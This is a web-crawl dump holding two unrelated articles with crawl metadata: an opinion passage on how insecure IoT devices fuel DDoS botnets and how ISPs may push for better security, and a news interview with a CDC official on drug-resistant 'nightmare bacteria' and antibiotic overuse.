Conversely, website hosting companies, operators, and other entities attacked by these IoT botnet armies are highly motivated to address the issue of unsecured IoT devices. But, in most cases, they lack the resources to mitigate botnet attacks, or the influence to make manufacturers provide better device security.
The current level of IoT device security varies. While some higher-end household appliances like smart refrigerators may incorporate more robust security features, many lower-end devices like lights and thermostats have no security measures in place – and most lack a user interface to manage the device.
As the IoT market continues to swell – Cisco estimates 15 billion IoT devices today, IDC/Intel foresees 200 billion such devices by 2020 – the vast majority of these internet-connected gadgets are of the low-end, low-priced, low-security variety.
Customer demand continues driving these manufacturers to emphasize time-to-market and user features (rather than security), meaning the problem and risks will only worsen.
The rapid introduction of billions more connected devices, with little attention to security and in most instances no ability to add security features later, opens the door for cybercriminals to easily grow massive botnets. These botnets can be rented to the highest bidder for everything from DDoS attacks, to simulating human behavior for ad fraud, to any other malicious use they may serve.
While IoT device owners largely remain unaware of the crimes their toasters and light bulbs may be perpetrating, the companies, countries, and websites being targeted and shut down through massive DDoS attacks are all too aware of the issue. Every minute these entities are offline directly translates into lost revenue opportunity and damage to their reputations. Manufacturers may not currently feel pressure to improve their IoT device security features, but it’s easy to understand that website owners and hosting operators cannot allow the status quo to continue.
Given the rapid pace of technology and the level of sophistication prevalent within the hacking community, I don’t place much faith in a regulatory-based approach to a solution. Instead, these are the steps toward a secure IoT that I predict will occur. First, website owners and hosting companies will seek to stop botnet attacks at the point of their own connections to the internet.
However, their attempts will only be minimally successful, for many of the reasons stated above. Next, website owners and hosting companies will try to pressure ISPs – local telcos, communications service providers (CSPs), and cable companies (like Comcast or Cox in the US, Sky in the UK, and others) – that provide bandwidth to IoT devices used in botnet attacks. As a result, the ISPs will be made to address the issue.
One possibility will be to introduce “metered” broadband, making consumers responsible for increased costs due to botnet-related IoT device activity. Another alternative is for the ISPs to send warning notices when their IoT devices are used in attacks (or even just represent a risk) – and to disable connectivity to those customers if botnet traffic persists.
When consumers are faced with the responsibility, and perhaps even liable for the malicious activities of their IoT devices, and when ISPs block compromised devices from the internet, we can then expect consumers to place an emphasis on security features when purchasing an IoT device. Manufacturers will produce what the market demands. This will be a major stride toward the safer, more secure IoT and internet necessary for each to succeed and thrive in the long term. | <urn:uuid:63e5139d-b945-4f9d-88d3-f6af2dba7325> | CC-MAIN-2017-09 | https://www.infosecurity-magazine.com/opinions/users-secure-iot-devices/?utm_source=dlvr.it&utm_medium=twitter | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170613.8/warc/CC-MAIN-20170219104610-00251-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.943807 | 966 | 2.625 | 3 |
We created the nightmare bacteria.
It wasn't on purpose. We could not have invented antibiotics without spurring bacterial evolution. As long as there were some bugs out there immune to the drugs, the population would adapt. Just a few years after antibiotics came into mass use in the 1940s, scientists began to observe resistance. Then, as microbiologist Kenneth Todar writes, "Over the years, and continuing into the present, almost every known bacterial pathogen has developed resistance to one or more antibiotics in clinical use." And now, some bugs are resistant to just about everything.
Carbapenem-resistant Enterobacteriaceae, known as CRE or the "nightmare bacteria," was not known before 2001. Now, 4.6 percent of hospitals in the United States reported at least one infection in 2012. That number was 1.2 percent in 2001.
CRE outbreaks are the stuff of zombie movies, because no drug exists to fight them. In 2011, at a National Institutes of Health hospital no less, an outbreak of a CRE variant killed six people. CRE germs kill about half the people they infect, but here's the scarier part: "CRE have the potential to move from their current niche among health care–exposed patients into the community," the Centers for Disease Control and Prevention reports.
Drug-resistant pathogens such as CRE are mainly found in the hospital setting, but they are also found in the environment. A Columbia University study found drug-resistant germs to be "widespread" in the Hudson River in New York, with the researchers suspecting the source was untreated sewage. The more commonly knownMRSA, confined to infections in hospitals in the first two decades after it was discovered, can now be contracted from everyday surfaces such as gym mats.
Last week, CDC released the first comprehensive review of the number of drug-resistant infections and deaths in the country. It's the first of its kind, compiling data from dozens of different strains of bacteria in one report. It finds that at least 2 million Americans become infected with drug-resistant bacteria every year, resulting in 23,000 deaths. The report stresses that these numbers are conservative, as they only take into account infections in acute-care hospitals, not long-term centers.
Recently, I spoke with Jean Patel, one of the authors of the report and a deputy director of CDC's Antimicrobial Resistance Division. She spoke about the need to increase awareness of antibiotic resistance and ways to combat its spread. Her responses have been lightly edited. My questions have been rephrased to sound slightly smarter.
Are we approaching a future where antibiotics will be obsolete?
Antibiotics are always going to have a role, but what we have to decide is to stop relying on them as the only role. So now we have to think, and have a greater focus on prevention of the transmission of resistant pathogens and using antibiotics as wisely as possible.
There are some infections like strep throat where antibiotics are going to be needed. But there are other infections, like upper respiratory tract infections, the common cold, where antibiotics are not necessary. And your doctor can help guide you through that choice. I think it is important on both sides—the doctor and the patient—to decide that antibiotics aren't always necessary.
Any threat of—or just a hypothetical threat—of a drug-resistant pandemic?
I think the scary endpoint that we are looking at are bacteria that are becoming resistant to all agents that could be used for treating them. Right now we have some of those pathogens, but they may be limited to certain populations. An example is CRE. Right now, those are bacteria that are becoming resistant to nearly every drug. But right now they are only causing infections in the health care setting. We anticipate that changing. We saw that happen with the ESPL producing Enterobacteriaceae, but it hasn't happened yet. But we think we have some time before it does happen. But we need to beef up our focus on prevention.
What does prevention look like? And what role does pharmaceutical innovation play?
I think it needs both. On one end, we need health care providers to make better decisions about using antibiotics. And I think to do that we need more information. We need to get more information in the hands of those health care providers so they can make the best decisions possible.
And we're working on expanding the scope of our ability to track antibiotic resistance and also antibiotic use in health care settings. So a physician would look at the antibiotic use and in their health care setting they'd be able to benchmark what's happening in their setting, and compare to other health care settings.
The report calls for an end of antibiotics use in livestock. How might that happen?
Antibiotics need to be used in the process of food-producing animals. But we are asking that this be used to manage infections and not be used to promote growth of the animals. And this is consistent with what the Food and Drung Administration has proposed. So the FDA has draft guidance that maps out a plan for phasing out antibiotic use for growth promotion in animals, and instead using these antibiotics to manage infections in animals. And we support that.
What's the take-home lesson?
The most important thing for the patients is a focus on antibiotic use. Having that conversation with your physician about whether antibiotics are really needed for the illness that they have.
Do we have numbers on antibiotics misuse?
In the health care system, we estimate that 50 percent of antibiotic use is unnecessary or not appropriate.
Can we ever stop the creation of new drug-resistant germs?
We can slow it down. Nature will take its course wherever antibiotics are used. Resistance will emerge, but we can slow that. | <urn:uuid:85e59342-ad82-4805-b1ff-1be61d06b5ac> | CC-MAIN-2017-09 | http://www.nextgov.com/health/2013/09/what-know-about-drug-resistant-superbugs-killed-23000-last-year/70686/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171463.89/warc/CC-MAIN-20170219104611-00127-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.964091 | 1,179 | 3.203125 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.